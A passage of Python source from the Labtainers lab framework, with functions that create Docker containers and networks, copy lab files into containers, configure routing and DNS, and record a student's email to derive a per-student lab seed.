createsinglecommand = "docker create %s %s --shm-size=2g -t %s --cap-add NET_ADMIN %s %s %s %s %s %s --name=%s --hostname %s %s %s %s %s %s" % \
(shm, container.docker_args, dns_param, network_param, subnet_ip, mac, priv_param, add_host_param,
publish_param, clone_fullname, clone_host, volume,
multi_user, num_cpu_str, cpu_set_str, new_image_name)
logger.debug("Command to execute was (%s)" % createsinglecommand)
ps = subprocess.Popen(shlex.split(createsinglecommand), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1]) > 0:
logger.debug('command was %s' % createsinglecommand)
if 'Cannot connect to the Docker daemon' in output[1].decode('utf-8'):
print('\n\nERROR: Docker seems not to be running.')
print('Try "sudo systemctl restart docker"\n\n')
logger.error('CreateSingleContainer %s' % output[1].decode('utf-8'))
retval = False
break
#print('result of create %s' % output[0])
return retval
def GetIface(ip):
cmd = 'ifconfig | grep -B1 "inet addr:%s" | awk \'$1!="inet" && $1!="--" {print $1}\'' % ip
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
return output[0].decode('utf-8').strip()
def CheckPromisc(iface):
cmd = "netstat -i | grep enp0s8 | awk '{print $12}'"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if 'P' in output[0].decode('utf-8'):
return True
else:
return False
# Create SUBNETS
def CreateSubnets(start_config):
has_tap = False
subnets = start_config.subnets
#for (subnet_name, subnet_network_mask) in networklist.iteritems():
for subnet_name in subnets:
subnet_network_mask = subnets[subnet_name].mask
logger.debug("subnet_name is %s" % subnet_name)
logger.debug("subnet_network_mask is %s" % subnet_network_mask)
if subnets[subnet_name].tap:
has_tap = True
command = "docker network inspect %s" % subnet_name
#logger.debug("Command to execute is (%s)" % command)
inspect_result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug("Result of subprocess.call CreateSubnets docker network inspect is %s" % inspect_result)
if inspect_result == FAILURE:
# Fail means does not exist - then we can create
macvlan = ''
ip_range = ''
net_type = 'bridge'
if subnets[subnet_name].macvlan_use is not None:
#iface = GetIface(subnets[subnet_name].macvlan)
iface = subnets[subnet_name].macvlan_use
if iface is None or len(iface) == 0:
logger.error("No IP assigned to network %s, assign an ip on Linux host to enable use of macvlan with Labtainers")
exit(1)
if not CheckPromisc(iface):
logger.warning("network %s not in promisc mode, required for macvlan inter-vbox comms\nUse: sudo ifconfig %s promisc" % (iface, iface))
macvlan = '-o parent=%s -o macvlan_mod=bridge' % iface
net_type = 'macvlan'
if subnets[subnet_name].ip_range is not None:
ip_range = '--ip-range %s' % subnets[subnet_name].ip_range
if subnets[subnet_name].gateway != None:
logger.debug(subnets[subnet_name].gateway)
subnet_gateway = subnets[subnet_name].gateway
command = "docker network create -d %s --gateway=%s --subnet %s %s %s %s" % (net_type, subnet_gateway, subnet_network_mask, macvlan, ip_range, subnet_name)
else:
command = "docker network create -d %s --subnet %s %s %s %s" % (net_type, subnet_network_mask, macvlan, ip_range, subnet_name)
#logger.debug("Command to execute is (%s)" % command)
#create_result = subprocess.call(command, shell=True)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug("stdout of subprocess.call CreateSubnets docker network create is %s" % output[0].decode('utf-8'))
if len(output[1]) > 0:
logger.debug('stderr of %s is %s' % (command, output[1].decode('utf-8')))
found_match_network = False
found_match_network_name = ""
# Before a hard exit - give the user some indication of what to do next
# First check to see if a gateway is provided and it is already used
if 'no matching subnet' in output[1].decode('utf-8'):
logger.error('Config error: %s' % output[1].decode('utf-8'))
exit(1)
if subnets[subnet_name].gateway != None:
found_match_network, found_match_network_name = FindNetworkGivenGatewayIP(subnets[subnet_name].gateway)
# If Gateway IP address not okay, no need to check subnet anymore
if not found_match_network:
# Gateway IP address might be okay but subnet mask might not
found_match_network, found_match_network_name = FindNetworkGivenSubnet(subnet_network_mask)
else:
# No Gateway IP address, check the subnet mask only
found_match_network, found_match_network_name = FindNetworkGivenSubnet(subnet_network_mask)
# At this point, if still not found then just print error and exit
if not found_match_network:
logger.error("Failed to create %s subnet at %s, %s\n" % (subnet_name, subnet_network_mask, output[1].decode('utf-8')))
logger.error("command was %s\n" % command)
sys.exit(1)
else:
# Found either a network matching the Gateway IP address or matching subnet
lablist = []
# See if any lab is using that network
lablist = GetListLabContainerOnNetwork(found_match_network_name)
if lablist == []:
# No lab is using the network - tell user to remove that "left-over" network
logger.error("An existing Docker network is preventing this lab from starting.")
logger.error("Try removing the network with:")
logger.error("docker network rm %s" % found_match_network_name)
sys.exit(1)
else:
# There is lab using that network - tell user to stop that lab first
logger.error("An existing Docker network is preventing this lab from starting.")
logger.error("This may be due to a failure to stop a previous lab.")
logger.error("Please stop the lab %s and try again." % lablist)
sys.exit(1)
else:
logger.error("Already exists! Not creating %s subnet at %s!\n" % (subnet_name, subnet_network_mask))
return has_tap
def RemoveSubnets(subnets, ignore_stop_error):
for subnet_name in subnets:
command = "docker network rm %s" % subnet_name
logger.debug('command %s' % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8')) > 0:
if ignore_stop_error:
logger.debug('Encountered error removing subnet %s' % subnet_name)
else:
logger.error('Encountered error removing subnet %s' % subnet_name)
EMAIL_TMP='./.tmp/email.txt'
def getHomeEmail():
''' compatability for move of email to ~/.local/share/labtainers '''
homedir = os.environ['HOME']
lab_app = os.path.join(homedir,'.local', 'share', 'labtainers')
logger.debug('getHomeEmail lab_app %s' % lab_app)
try:
os.makedirs(lab_app)
except:
pass
email_path = os.path.join(lab_app, 'email.txt')
if not os.path.isfile(email_path):
logger.debug('getHomeEmail no email at %s' % email_path)
if os.path.isfile(EMAIL_TMP):
logger.debug('getHomeEmail copy from %s' % EMAIL_TMP)
shutil.copy(EMAIL_TMP, lab_app)
else:
if 'LABTAINER_DIR' in os.environ:
student_email = os.path.join(os.environ['LABTAINER_DIR'], 'scripts', 'labtainer-student','.tmp', 'email.txt')
if os.path.isfile(student_email):
shutil.copy(student_email, lab_app)
else:
logger.debug('No email found at %s' % student_email)
else:
logger.debug('LABTAINER_DIR not in env, no email path found')
return email_path
def getLastEmail():
retval = None
home_email = getHomeEmail()
if os.path.isfile(home_email):
with open(home_email) as fh:
retval = fh.read()
if retval is not None:
retval = retval.strip()
return retval
def putLastEmail(email):
home_email = getHomeEmail()
with open(home_email, 'w') as fh:
fh.write(email)
def GetLabSeed(lab_master_seed, student_email):
# Create hash using LAB_MASTER_SEED concatenated with user's e-mail
# LAB_MASTER_SEED is per laboratory - specified in start.config
string_to_be_hashed = '%s:%s' % (lab_master_seed, student_email)
mymd5 = hashlib.new('md5')
mymd5.update(string_to_be_hashed.encode('utf-8'))
mymd5_hex_string = mymd5.hexdigest()
return mymd5_hex_string
#def ParamStartConfig(lab_seed):
def ParamForStudent(lab_master_seed, mycontainer_name, container, labname,
student_email, lab_path, name, image_info, num_containers, running_container=None):
# NOTE image_info may or may not be populated.
if running_container == None:
running_container = mycontainer_name
mymd5_hex_string = GetLabSeed(lab_master_seed, student_email)
logger.debug(mymd5_hex_string)
if container.wait_for is not None:
logger.debug('waiting for %s to finish parameterizing' % container.wait_for)
WaitStartSync(container.wait_for)
if not ParameterizeMyContainer(mycontainer_name, container.image_name, container.user,
container.password, mymd5_hex_string,
student_email, labname, lab_path, name, image_info, running_container):
logger.error("Failed to parameterize lab container %s!\n" % mycontainer_name)
sys.exit(1)
logger.debug('back from ParameterizeMyContainer for %s' % mycontainer_name)
CreateStartSync(container.name)
num_done = CountStartSync()
dockerPull.moveUp(1)
if num_done == num_containers:
progress = 'Started %d containers, %d completed initialization. Done.\n' % (num_containers, num_done)
else:
progress = 'Started %d containers, %d completed initialization, please wait...\n' % (num_containers, num_done)
dockerPull.clearLine()
sys.stdout.write(progress)
def DockerCmd(cmd, noloop=False, good_error=None):
ok = False
count = 0
if noloop:
count = 1000
while not ok:
#logger.debug("Command to execute is (%s)" % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8')) > 0:
count += 1
err_string = output[1].decode('utf-8')
if good_error is not None and good_error in err_string:
#logger.debug("Failed cmd %s BUT got good error %s" % (cmd, good_error))
return True
logger.debug("Failed cmd %s %s" % (cmd, err_string))
if count > 1:
return False
time.sleep(1)
else:
ok = True
if len(output[0].decode('utf-8')) > 0:
logger.debug("cmd %s stdout: %s" % (cmd, output[0].decode('utf-8')))
out = output[0].decode('utf-8')
if 'unrecognized option' in out or 'Unexpected EOF' in out:
return False
return True
def CopyInstrConfig(mycontainer_name, container_user, lab_path):
cmd = 'docker cp %s/instr_config/. %s:/home/%s/.local/instr_config/' % (lab_path, mycontainer_name, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd = 'docker cp %s/config/. %s:/home/%s/.local/config/' % (lab_path, mycontainer_name, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
def CopyLabBin(mycontainer_name, mycontainer_image_name, container_user, lab_path, name, image_info):
here = os.path.dirname(os.path.abspath(__file__))
parent = os.path.dirname(here)
lab_bin_path = os.path.join(parent, 'lab_bin')
cmd = 'docker cp %s/. %s:/home/%s/.local/bin/' % (lab_bin_path, mycontainer_name, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
''' TBD DO NOT move lab/config here -- would not catch the tar_list.txt files (skip list) '''
''' TBD perhaps move lab/_bin to here? would it save duplicate containers?'''
#container_bin = os.path.join(lab_path, name,'_bin')
#if os.path.isdir(container_bin):
# cmd = 'docker cp %s/. %s:/home/%s/.local/bin/' % (container_bin, mycontainer_name, container_user)
# DockerCmd(cmd)
tmp_dir=os.path.join('/tmp/labtainers', mycontainer_name)
shutil.rmtree(tmp_dir, ignore_errors=True)
try:
os.makedirs(tmp_dir)
except os.error:
logger.error("did not expect to find dir %s" % tmp_dir)
capinout = os.path.join(parent, 'lab_sys', 'usr','sbin', 'capinout')
if not os.path.isfile(capinout):
print('\n\n********* ERROR ***********')
print('%s is missing. If this is a development system, you may need to' % capinout)
print('go to the tool-src/capinout directory and run ./mkit.sh')
''' Copy file to /lib and /sys. Account for sym link fu '''
dest_tar = os.path.join(tmp_dir, 'labsys.tar')
lab_sys_path = os.path.join(parent, 'lab_sys')
cmd = 'tar cf %s -C %s usr etc bin' % (dest_tar, lab_sys_path)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('tar failure %s result: %s' % (cmd, output[1].decode('utf-8')))
cmd = 'docker cp %s %s:/var/tmp/' % (dest_tar, mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd = 'docker exec %s script -q -c "sudo tar -x --keep-directory-symlink -f /var/tmp/labsys.tar -C /"' % (mycontainer_name)
#if mycontainer_image_name in osTypeMap and osTypeMap[mycontainer_image_name] == 'ubuntu18':
# cmd = 'docker exec %s script -q -c "sudo tar -x --keep-directory-symlink -f /var/tmp/labsys.tar -C /"' % (mycontainer_name)
#else:
# cmd = 'docker exec %s script -q -c "sudo tar -x --keep-directory-symlink -f /var/tmp/labsys.tar -C /usr/"' % (mycontainer_name)
if not DockerCmd(cmd):
cmd = 'docker cp lab_sys/. %s:/' % (mycontainer_name)
#if osTypeMap[mycontainer_image_name] == 'ubuntu18':
# cmd = 'docker cp lab_sys/. %s:/' % (mycontainer_name)
#else:
# cmd = 'docker cp lab_sys/. %s:/usr/' % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
logger.debug('CopyLabBin tar failed for lab_sys, explicit copy')
if mycontainer_image_name in osTypeMap and osTypeMap[mycontainer_image_name] == 'ubuntu20':
cmd = 'docker exec %s script -q -c "sed -i \'s/env python/env python3/\' /usr/sbin/mynotify.py"' % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed changing mynotify to python3: %s' % cmd)
exit(1)
# Copy Students' Artifacts from host to instructor's lab container
def CopyStudentArtifacts(labtainer_config, mycontainer_name, labname, container_user, container_password):
# Set the lab name
command = 'docker exec %s script -q -c "echo %s > /home/%s/.local/.labname" /dev/null' % (mycontainer_name, labname, container_user)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call CopyStudentArtifacts set labname is %s (1=>FAILURE)" % result)
if result == FAILURE:
logger.error("Failed to set labname in container %s!\n" % mycontainer_name)
sys.exit(1)
# Create is_grade_container
command = 'docker exec %s script -q -c "echo TRUE > /home/%s/.local/.is_grade_container" /dev/null' % (mycontainer_name, container_user)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call CopyStudentArtifacts create is_grade_container is %s (1=>FAILURE)" % result)
if result == FAILURE:
logger.error("Failed to create is_grade_container in container %s!\n" % mycontainer_name)
sys.exit(1)
username = getpass.getuser()
xfer_dir = os.path.join(labtainer_config.host_home_xfer, labname)
zip_filelist = glob.glob('/home/%s/%s/*.zip' % (username, xfer_dir))
lab_filelist = glob.glob('/home/%s/%s/*.lab' % (username, xfer_dir))
zip_filelist.extend(lab_filelist)
logger.debug("filenames is (%s)" % zip_filelist)
# Copy zip files from 'Shared' folder to 'home/$CONTAINER_USER'
for fname in zip_filelist:
logger.debug("name is %s" % fname)
base_fname = os.path.basename(fname)
# Copy zip file
command = 'docker cp %s %s:/home/%s/' % (fname, mycontainer_name, container_user)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.call CopyStudentArtifacts copy zipfile (%s) is %s (1=>FAILURE)" % (fname, result))
if result == FAILURE:
logger.error("Failed to copy student artifacts into container %s!\n" % mycontainer_name)
sys.exit(1)
#command = 'docker exec %s echo "%s\n" | sudo -S chown %s:%s /home/%s/%s' % (mycontainer_name, container_password,
# container_user, container_user, container_user, base_fname)
#command = 'docker exec %s chown %s:%s /home/%s/%s' % (mycontainer_name,
# container_user, container_user, container_user, base_fname)
#logger.debug("Command to execute is (%s)" % command)
#result = subprocess.call(command, shell=True)
#logger.debug("Result of subprocess.call CopyStudentArtifacts copy zipfile (%s) is %s" % (fname, result))
#if result == FAILURE:
# logger.error("Failed to set labname in container %s!\n" % mycontainer_name)
# sys.exit(1)
def GetRunningContainersList():
cmd = "docker container ls --format {{.Names}}"
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8').strip()) > 0:
logger.debug('No running containers: error returned %s, return false' % output[1].decode('utf-8'))
return False, None
result = output[0].decode('utf-8').strip()
logger.debug('result is %s' % result)
if 'Error:' in result or len(result.strip()) == 0:
if 'Error:' in result:
logger.debug("Command was (%s)" % cmd)
logger.debug("Error from command = '%s'" % result)
return False, result
containers_list = result.split('\n')
return True, containers_list
def GetRunningLabNames(containers_list):
labnameslist = []
found_lab_role = False
for each_container in containers_list:
#print each_container
if each_container.endswith('.student'):
splitstring = each_container.split('.')
labname = splitstring[0]
found_lab_role = True
if labname not in labnameslist:
labnameslist.append(labname)
return found_lab_role, labnameslist
class ImageInfo():
def __init__(self, name, creation, user, local, local_build, version, use_tag):
self.name = name
self.creation = creation
self.user = user
self.local = local
''' whether a locally built image '''
self.local_build = local_build
self.version = None
self.use_tag = use_tag
if version is not None:
version = version.replace('"', '')
if version != 'null' and len(version.strip()) > 0:
try:
self.version = version
except:
logger.error('failed getting version from string <%s>' % version)
traceback.print_exc()
traceback.print_stack()
exit(1)
def inspectImage(image_name):
created = None
user = None
version = None
cmd = "docker inspect -f '{{.Created}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].decode('utf-8').strip()) > 0:
created = output[0].decode('utf-8').strip()
cmd = "docker inspect -f '{{.Config.User}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].decode('utf-8').strip()) > 0:
user = output[0].decode('utf-8').strip()
cmd = "docker inspect --format='{{json .Config.Labels.version}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].decode('utf-8').strip()) > 0:
version = output[0].decode('utf-8').strip()
return created, user, version
def imageInfo(image_name, registry, base_registry, labtainer_config, is_rebuild=False, no_pull=False, quiet=False, local_build=False):
''' image_name lacks registry info (always)
First look if plain image name exists, suggesting
an ongoing build/test situation '''
retval = None
use_tag = 'latest'
created, user, version = inspectImage(image_name)
if created is not None:
retval = ImageInfo(image_name, created, user, True, True, version, use_tag)
logger.debug('%s local built, ts %s %s' % (image_name, created, user))
else:
''' next see if there is a local image from the desired registry '''
with_registry = '%s/%s' % (registry, image_name)
created, user, version = inspectImage(with_registry)
if created is not None:
retval = ImageInfo(with_registry, created, user, True, False, version, use_tag)
logger.debug('%s local from reg, ts %s %s version: %s' % (with_registry, created, user, version))
elif not local_build:
''' See if the image exists in the desired registry '''
reg_host = None
if ':' in labtainer_config.test_registry:
reg_host = labtainer_config.test_registry.split(':')[0]
logger.debug('imageInfo reg_host: %s registry: %s' % (reg_host, registry))
if reg_host is not None and registry.startswith(reg_host):
created, user, version, use_tag, base = InspectLocalReg.inspectLocal(image_name, logger,
registry, is_rebuild=is_rebuild, quiet=quiet, no_pull=no_pull)
else:
created, user, version, use_tag = InspectRemoteReg.inspectRemote(with_registry, logger,
is_rebuild=is_rebuild, quiet=quiet, no_pull=no_pull, base_registry=base_registry)
if created is None and not is_rebuild:
if not InspectRemoteReg.reachDockerHub():
logger.error('Unable to reach DockerHub. \nIs the network functional?\n')
if created is not None:
logger.debug('%s only on registry %s, ts %s %s version %s use_tag %s' % (with_registry, registry, created, user, version, use_tag))
retval = ImageInfo(with_registry, created, user, False, False, version, use_tag)
if retval is None:
logger.debug('%s not found local_build was %r' % (image_name, local_build))
return retval
def GetBothConfigs(lab_path, logger, servers=None, clone_count=None):
labtainer_config_dir = os.path.join(os.path.dirname(os.path.dirname(lab_path)), 'config', 'labtainer.config')
labtainer_config = ParseLabtainerConfig.ParseLabtainerConfig(labtainer_config_dir, logger)
labname = os.path.basename(lab_path)
config_path = os.path.join(lab_path,"config")
start_config_path = os.path.join(config_path,"start.config")
start_config = ParseStartConfig.ParseStartConfig(start_config_path, labname,
labtainer_config, logger, servers=servers, clone_count=clone_count)
return labtainer_config, start_config
def pullDockerImage(registry, image_name):
image = '%s/%s' % (registry, image_name)
return dockerPull.pull(image)
'''
cmd = 'docker pull %s/%s' % (registry, image_name)
logger.debug('%s' % cmd)
print('pulling %s from %s' % (image_name, registry))
ps = subprocess.Popen(shlex.split(cmd), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
output = ps.communicate()
if len(output[1]) > 0:
return False
print('Done with pull')
return True
'''
def defineAdditionalIP(container_name, post_start_if, post_start_nets):
for subnet in post_start_nets:
existing_ip = post_start_if[subnet]
cmd = "docker exec %s bash -c 'ifconfig'" % (container_name)
logger.debug('cmd is %s' % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug('out0 %s \nout1 %s' % (output[0].decode('utf-8'), output[1].decode('utf-8')))
current_if = None
this_if = None
for line in output[0].decode('utf-8').splitlines():
parts = line.split()
if len(parts) < 2:
continue
if parts[1] == 'Link':
current_if = parts[0]
elif parts[1] == ('addr:%s' % post_start_if[subnet]):
this_if = current_if
break
count = 1
for ip in post_start_nets[subnet]:
cmd = "docker exec %s bash -c 'ifconfig %s:%d %s'" % (container_name, this_if, count, ip)
logger.debug('next cmd is %s' % cmd)
if not DockerCmd(cmd):
print('error doing %s' % cmd)
exit(1)
count += 1
def MakeNetMap(start_config, mycontainer_name, container_user):
''' filter docker network list to include only tapped lans, and append MAC to each line '''
cmd = "docker network ls"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
nlist = []
for subnet in start_config.subnets:
if start_config.subnets[subnet].tap == 'yes':
nlist.append(subnet)
if len(output[1].strip()) == 0:
with open('/tmp/net_map.txt', 'w') as fh:
''' for each network reported by docker '''
for line in output[0].decode('utf-8').splitlines():
parts = line.split()
net = parts[1]
eth = 'br-%s' % parts[0]
''' find if it matches a tapped subnet in this lab '''
for subnet in nlist:
if subnet == net:
''' NOTE mac is no longer used, include for compatability. Remove later '''
mac = get_hw_address(eth)
new_line = '%s %s\n' % (line, mac)
fh.write(new_line)
break
cmd = 'docker cp /tmp/net_map.txt %s:/var/tmp/' % (mycontainer_name)
DockerCmd(cmd)
def WaitForTap(start_config):
retval = True
tap_dir = GetWaitTapDir()
tap_lock = os.path.join(tap_dir,'lock')
fail_at = 40
while not os.path.isdir(tap_lock):
fail_at = fail_at - 1
if fail_at <= 0:
retval = False
logger.error('tap lock dir not created at %s, exiting' % tap_lock)
log_path = os.path.join(os.getenv('LABTAINER_DIR'), 'logs', 'start_labdump.log')
tap = FindTap(start_config)
if tap is None:
logger.error('No component with TAP attribute')
break
cmd = 'docker cp %s:/var/log/start_labdump.log %s' % (tap, log_path)
if not DockerCmd(cmd):
logger.error('failed to copy start_labdump.log')
break
logger.debug('tap dir does not yet exist')
time.sleep(1)
return retval
def DoStartOne(labname, name, container, start_config, labtainer_config, lab_path,
student_email, quiet_start, results, auto_grade, image_info):
retval = True
mycontainer_name = container.full_name
mycontainer_image_name = container.image_name
container_user = container.user
container_password = container.password
''' mananage interfaces with multiple IP addresses, docker does not support directly '''
post_start_if = {}
post_start_nets = {}
haveContainer = AllContainersCreated(container)
logger.debug("DoStart for %s AllContainersCreated result (%s)" % (container.name, haveContainer))
display = os.getenv('DISPLAY')
if ':' in display:
display = display.split(':')[1]
display_num = int(float(display))
else:
logger.error('could not get display number from %s' % os.getenv('DISPLAY'))
return
# Set need_seeds=False first
need_seeds=False
# IsContainerCreated return False if container does not exists
if not haveContainer:
# Container does not exist, create the container
# Use CreateSingleContainer()
containerCreated = False
if len(container.container_nets) == 0 or container.tap == 'yes':
containerCreated = CreateSingleContainer(labtainer_config, start_config, container, lab_path, quiet=quiet_start)
else:
#mysubnet_name, mysubnet_ip = container.container_nets.popitem()
mysubnet_name = next(iter(container.container_nets))
mysubnet_ip = container.container_nets[mysubnet_name]
container.did_net(mysubnet_name)
subnet_name = mysubnet_name
if ':' in mysubnet_name:
subnet_name = mysubnet_name.split(':')[0]
post_start_if[subnet_name] = mysubnet_ip
containerCreated = CreateSingleContainer(labtainer_config, start_config, container, lab_path,
mysubnet_name=subnet_name, mysubnet_ip=mysubnet_ip, quiet=quiet_start)
logger.debug("CreateSingleContainer %s result (%s)" % (mycontainer_name, containerCreated))
if not containerCreated:
logger.error("CreateSingleContainer fails to create container %s!\n" % mycontainer_name)
results.append(False)
return
# Give the container some time -- just in case
#time.sleep(3)
# If we just create it, then set need_seeds=True
need_seeds=True
# Check again -
haveContainer = AllContainersCreated(container)
logger.debug("AllContainersCreated second check for %s result (%s)" % (container.name, haveContainer))
# IsContainerCreated returned False if container does not exists
if not haveContainer:
logger.error("Container %s still not created!\n" % mycontainer_name)
results.append(False)
return
num_containers = len(start_config.containers.items())
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
wait_for_tap = False
for mysubnet_name, mysubnet_ip in container.container_nets.items():
if start_config.subnets[mysubnet_name].tap:
wait_for_tap = True
if mysubnet_name in container.did_nets:
continue
subnet_name = mysubnet_name
if ':' in mysubnet_name:
subnet_name = mysubnet_name.split(':')[0]
if subnet_name not in post_start_nets:
post_start_nets[subnet_name] = []
if subnet_name not in post_start_if:
post_start_if[subnet_name] = mysubnet_ip
#logger.debug('container: %s assigned post_start_if[%s] %s, connecting' % (mycontainer_name, subnet_name, mysubnet_ip))
connectNetworkResult = ConnectNetworkToContainer(start_config, mycontainer_name, subnet_name, mysubnet_ip)
else:
post_start_nets[subnet_name].append(mysubnet_ip)
else:
connectNetworkResult = ConnectNetworkToContainer(start_config, mycontainer_name, mysubnet_name, mysubnet_ip)
if wait_for_tap:
if not WaitForTap(start_config):
results.append(False)
return
# Start the container
if not StartMyContainer(mycontainer_name):
logger.error("Container %s failed to start!\n" % mycontainer_name)
results.append(False)
return
defineAdditionalIP(mycontainer_name, post_start_if, post_start_nets)
if container.x11.lower() == 'yes':
''' Avoid problems caused by container wiping out all of /tmp on startup '''
cmd = "docker exec %s bash -c 'mkdir -p /var/tmp/.X11-unix'" % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
results.append(False)
return
count = 0
cmd = "docker exec %s bash -c 'ln -s /var/tmp/.X11-unix/X%d /tmp/.X11-unix/X%d'" % (mycontainer_name,
display_num, display_num)
while not DockerCmd(cmd, noloop=True, good_error='File exists') and count<5:
time.sleep(1)
count += 1
if count >= 5:
logger.error('failed %s' % cmd)
results.append(False)
return
clone_need_seeds = need_seeds
if not clone_need_seeds:
cmd = "docker exec %s bash -c 'ls -l /var/labtainer/did_param'" % (mycontainer_name)
if not DockerCmd(cmd):
print('One or more containers exists but are not parameterized.')
print('Please restart this lab with the "-r" option.')
DoStop(start_config, labtainer_config, lab_path, False)
logger.error('One or more containers exists but not parameterized.')
results.append(False)
return
# If the container is just created, then use the previous user's e-mail
# then parameterize the container
elif quiet_start and clone_need_seeds:
ParamForStudent(start_config.lab_master_seed, mycontainer_name, container,
labname, student_email, lab_path, name, image_info, num_containers)
elif clone_need_seeds:
ParamForStudent(start_config.lab_master_seed, mycontainer_name, container,
labname, student_email, lab_path, name, image_info, num_containers)
if container.no_gw:
cmd = "docker exec %s bash -c 'sudo /bin/ip route del 0/0'" % (mycontainer_name)
DockerCmd(cmd)
cmd = "docker exec %s bash -c 'sudo route del default'" % (mycontainer_name)
DockerCmd(cmd)
if container.no_resolve:
cmd = "docker exec %s bash -c 'sudo echo \"\" > /etc/resolv.conf'" % (mycontainer_name)
DockerCmd(cmd)
if container.tap == 'yes':
MakeNetMap(start_config, mycontainer_name, container_user)
if container.lab_gateway is not None:
cmd = "docker exec %s bash -c 'sudo /usr/bin/set_default_gw.sh %s'" % (mycontainer_name,
container.lab_gateway)
DockerCmd(cmd, good_error='SIOCDELRT: No such process')
#DockerCmd(cmd)
'''
ignore error. TBD filter errors due to my_host not being set
if not DockerCmd(cmd):
logger.error('Fatal error in docker command %s' % cmd)
results.append(False)
return
'''
cmd = "docker exec %s bash -c 'sudo route del my_host'" % (mycontainer_name)
#DockerCmd(cmd)
DockerCmd(cmd, good_error='SIOCDELRT: No such process')
if container.name_server is not None:
cmd = "docker exec %s bash -c 'echo \"nameserver %s\" | sudo tee /etc/resolv.conf'" % (mycontainer_name,
container.name_server)
if not DockerCmd(cmd):
logger.error('Fatal error in docker command %s' % cmd)
results.append(False)
return
results.append(retval)
def GetUserEmail(quiet_start):
user_email = None
while user_email is None:
done = True
# Prompt user for e-mail address
eprompt = '\nPlease enter your e-mail address: '
prev_email = getLastEmail()
if prev_email is not None:
eprompt = eprompt+" [%s]" % prev_email
#checks if quiet_start is true
if quiet_start and prev_email is not None:
user_email = prev_email
else:
if sys.version_info >=(3,0):
user_input = input(eprompt)
else:
user_input = raw_input(eprompt)
if not all(c in string.printable for c in user_input):
print('Bad characters detected. Please re-enter email')
elif '"' in user_input or "'" in user_input:
print('No quotes allowed. Please re-enter email')
else:
user_email = user_input
if user_email is not None:
#user_email = input(eprompt)
if len(user_email.strip()) == 0:
if prev_email is None:
print('You have provided an empty email address, which may cause your results to not be graded.')
if sys.version_info >=(3,0):
confirm = str(input('Use the empty address? (y/n)')).lower().strip()
else:
confirm = str(raw_input('Use the empty address? (y/n)')).lower().strip()
if confirm != 'y':
user_email = None
else:
user_email = prev_email
else:
putLastEmail(user_email)
return user_email
def CheckLabContainerApps(start_config, lab_path, apps2start):
apps2search = ['firefox', 'wireshark']
has_multi_container = False
num_containers = len(start_config.containers.items())
if num_containers > 1:
has_multi_container = True
apps2startfilepath = os.path.join(lab_path, '*/_bin', 'student_startup.sh')
apps2start_list = glob.glob('%s' % apps2startfilepath)
if apps2start_list != []:
# Parse each student_startup.sh - get a list of apps to start
# Currently only search for firefox or wireshark
for eachfile in apps2start_list:
with open(eachfile) as fh:
for line in fh:
if line.startswith('#') or len(line) == 0:
continue
for apps in apps2search:
if apps in line:
if apps not in apps2start:
apps2start.append(apps)
return has_multi_container
def ReloadStartConfig(lab_path, labtainer_config, start_config, student_email, logger, servers, clone_count):
labname = os.path.basename(lab_path)
my_start_config = os.path.join('./.tmp',labname, 'start.config')
if not os.path.isfile(my_start_config):
config_path = os.path.join(lab_path,"config")
start_config_path = os.path.join(config_path,"start.config")
param_path = os.path.join(config_path,"parameter.config")
try:
os.makedirs(os.path.dirname(my_start_config))
except os.error:
pass
shutil.copyfile(start_config_path, my_start_config)
lab_instance_seed = GetLabSeed(start_config.lab_master_seed, student_email)
logger.debug("lab_instance_seed for <%s> <%s> is %s" % (start_config.lab_master_seed, student_email, lab_instance_seed))
pp = ParameterParser.ParameterParser(None, None, lab_instance_seed, logger, lab=labname)
pp.ParseParameterConfig(param_path)
pp.DoReplace()
start_config = ParseStartConfig.ParseStartConfig(my_start_config, labname, labtainer_config, logger, skip_networks=False,
servers=servers, clone_count=clone_count)
